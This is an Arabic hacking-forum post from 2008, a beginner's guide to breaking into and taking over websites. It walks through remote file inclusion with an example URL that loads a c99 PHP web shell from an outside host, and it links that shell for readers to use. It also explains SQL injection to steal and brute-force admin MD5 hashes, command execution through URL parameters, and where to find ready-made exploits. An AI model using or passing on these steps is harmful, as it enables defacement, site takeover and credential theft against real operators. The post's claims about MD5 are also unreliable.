dahmanekeddi Admin
عدد المساهمات : 14 تاريخ التسجيل : 02/10/2008 العمر : 35 الموقع : taraga.rigala.net
| موضوع: تعلم إختراق المواقع الأحد ديسمبر 28 2008, 02:40 | |
| من اجل الدين ياملون تعلم اختراق المواقع و السيطرة عليها
او حتى الدين تعلموه ولم يهضموا بعد الاساسيات
سنبدا اولا ببعض الامور التي لا بد ان تعرفها لكي تبدا معنا الرحلة الممتعة في الاختراق
ان سالتك ما هو السيرفر
Serveur
مادا ستقول لي ؟ انا لا اعرف مادا ستقول
لكن انا انا اقول لك ان السيرفر هو جهاز حاسوب
فائق المواصفات من حيت السرعة و عدة مميزات كتيرة
زيادة الى انه شغال 24 ساعة على 24 ساعة بدون توقف
مما يجعلنا نرى اي موقع نريده في اي وقت نريده
فان اطفئ السيرفر لن تستطيع حتى ان تشم رائحة الموقع هههههههههههه
و هده االسيرفرات تملكها شركات استضافة .يعني انك تشتري مساحة في سيرفرها
و هناك العديد من السيرفرات في العالم
و كل سيرفر يحتوي على عدد غير محدود من المواقع
الان اصبحت تعرف ما هو السيرفر Serveur الان نمر الى شىء اخر
و هي لغات برمجة صفحات الويب (perl -python-php-asp-html)
يعني ان اي موقع تراه على الشبكة لابد ان يكون قد صمم باحد هده اللغات و باجمعها او على الاقل html
اولا لتخترق موقعا يا سعيد الحظ يجب ان يحتوي الموقع على تغرة
تمكنك من استغلالها و التحكم في الموقع و تغيير الصفحة الرئيسية
اولا :ما هي التغرات
التغرات يا اخي هي اخطاء في السكريبتات المستعملة في الموقع و السكريبتات هي البرامج المستعملة
متلا (سكريبت التحقق من كلمة السر ,سكريبت المنتدى ...)
و تكون مصممة بلغات برمجية مختلفة متل (php -perl-python) التي سبق ان تكلمنا عنها
يعني فقط خطا صغير من المبرمج يسبب في فقدانه للموقع و سنتطرق الان الى هده الاخطاء و تبسيطها
يجب ان تعرف ان التغرات كتيرة و لكل تغرة استغلالها
اول نوع و المحبوب لدى المخترقين و هو
remote file inclusion
هده التغرة تمكن المخترق من ادراج ملف خارجي الى ملفات الموقع المصاب
و لكي نبسط اكتر فان المبرمج يطلب من برنامجه ادراج صفحة ما في ملفات موقعه ليراها المتصفح
و لكن لا يحصر تلك الصفحة فقط مما يجعل المخترق يدرج ملف من اختياره
و غالبا ما ندرج ملف يسمى shell يمكننا من التجول في ملفات الموقع و رؤيتها و التصرف فيها حسب صلاحيتنا
و هناك انواع من هدا الشيل المصمم بلغة php متل c99 و r57 وكلها تؤدي نفس الغرض
و طريقة استعمال هدا الشيل تكون كالاتي :
ناخد كمتال موقع في عنوانه الاتي
www.site.com/index.php?page=login.php
www.site.com و هو العنوان الرئيسي للموقع كاي موقع اخر
index.php : وهي صفحة الويب الرئيسية التي يتوجه اليها المتصفح دون نقاش
بعد كتابة عنوان الموقع و قد تكون ايضا home او default
: ?علامة الاستعلام و تكتب لتترك المجال للتغريف بالمتغيرات الاخرى
page متغير كتبه المبرمج و يدل على الصفحة التي يجب ان يتم استدعاؤها و اظهارها و في هده الحالة
login.php و هي الصفحة التي طلب المبرمج استدعاؤها و ستظهر على المتصفح
و التغرة في هده الحالة هي ان بامكاننا ان نغيرالمتغير page الى ملف اخر غير login.php
و استغلال التغرة يكون هكدا :
http://www.site.com/index.php?page=h...m/shellc99.txt ?
كما رايتم قمنا بتغيير المتغير page بالملف الموجود في prob01.malware-site.www
وهو shellc99.txt تم وضعنا علامة ? ليتم قراءة الملف كملف php
الان و بعد تطبيقنا للتغرة اللديدة سيظهر الشيل و عليه ملفات الموقع ما عليك سوى البحت عن اي شئ
يفيدك في الاختراق
لن اتكلم عن استعمال الشيل و لكن عندما ترفع الشيل اتصل بي و ساضع موضوعا لاستعمال الشيل
و ان لم تكن تملك شيلا فاستعمل هدا الشيل http://prob01.malware-site.www/shellc99.txtو اما الموقع الدي تجده فيه التغرات جاهزة مع الاستغلال فهو www.milw0rm.com
و هناك مواقع عديدة لكن هدا احسنها
و ما في حالة كنت تخطط لاختراق موقع بعينه فما عليك الا البحت عن السكريبت الدي يستعمله و اكتب في
google
script exploit
مع تعويض script بالسكريبت لديك
الان نمر للنوع التاني من التغرات
تانيا :تغرات
remote sql injection
هدا النوع من التغرات يعتمد على الاخطاء في السكريبتات التي تتعامل مع قاعدة البيانات
و قاعدة البيانات كما يدل عليها اسمها
مكان للتخزين العشوائي للمعلمومات لاستعمالها بشكل منظم في صفحات الويب
و قاعدة البيانات تحتوي على اسماء و الارقام السرية
لمستعملي الموقع و كدلك الرقم السري لصاحب الموقع او ما يسمى بالمدير
و ان استطعنا ان نحصل على باس المدير سنستطيع الدخول به الى اعدادات الموقع و السيطرة عليه
و هدا النوع من التغرات نتائجه %75
و السبب هو حصولنا على الرقم السري المشفر يعني لابد من فك تشفيره
و يكون مشفرا بمعيار md5 وهو اصعب تشفير في مجال المواقع و لحد الان لا توجد البرامج لفك تشفيره
لكن توجد برامج لتشفير الرقم السري يعني تعطيه رقمك و يحوله الى كود من 32 رقم و لا يمكن بعد فك تشفيره
الا بطريقة واحدو و وحيدة هي عن طريق التخمين
و يعمل التخمين بالتقنية التالية : يبدا بتجربة جميع
الارقام الموجودة يعني كلها ان اعطيته الوقت و يشفرها و يقارنها
ب md5 الدي اعطيته فان كانت المقارنة هي التساوي فقد فك التشفير
المهم ان التغرة لها صدى كبير من الرغم دلك و عليك ان تعلم ان الحماية ما صنعت الا لتخترق ههههههه
تالتا :تغرات
commande execusion
و هده التغرات في المواقع تسمح لنا باعطاء امر للسيرفر serveur
الدي يحمل ملفات الموقع المستهدف
متلا :
www.myvictim.com/index.php?id=commande
و مكان commande نضع الامر الدس نريده متلا
الامر dir لاستعراض ملفات الموقع كلها و كدلك ls
و غيرها من الاموامر و عليك ان تتدكر ان هده الاموامر فقط لنظام التشغيل linux و ليس
windows
و اوامر الويندوز يعرفها الكل
الان انتهينا من شرح انواع التغرات و موقع milw0rm.com
يضع جديد التغرات المستكشفة في سكريبتات العالم ههههه
و هي موجودة في فقرة
web apps
و اود ان اخبر المبتدئين ببعض السكريبتات المشهورة
vbulletin اشهر منتدى في العالم و المطلوية تغراته بكترة ,
phpbb منتدى مشهور
phpnuk مجلة
joomla مجلة
و العديد من السكريبتات التي تصصمها شركات مختصة المحترفة منها و العادية
و انا انصح اي واحد يحب اختراق المواقع
ان يتعلم لغة php
و على فكرة فهي لغة سهلة و تفيد في الاختراق
و لا اريد اي مبتدئ ان يظن ان الامر صعب فانا على جدير الدكر تعلمت اختراق المواقع و اساسيته في شهرين فقط
لكن كلما تدربت في التغرات و حاولت اكتشافها لنفسك ستحترف ان شاء الله
بعد هدا الشرح كله تكون قد وضعت يدك على القاعدة القوية في اختراق المواقع و انقدتك من المعلومات المتشتتة التي تحصل عليها
في المواقع الاخرى
و تدكروا ان جميع الامتلة التي و ضعتها فقط هي امتلة و دلك لوجود استغلالات طويلة في عنوان url
ارجوا انا يتال الموضوع حقه من الردود | |
|